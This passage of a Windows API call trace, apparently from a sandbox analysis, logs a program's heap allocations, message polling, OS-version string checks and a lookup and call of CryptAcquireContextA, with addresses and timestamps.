HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.736] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.737] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.739] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.739] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0251.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.742] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.742] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.742] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.743] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.743] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0251.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.749] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0251.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0251.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0251.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.749] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.750] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2c70) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: 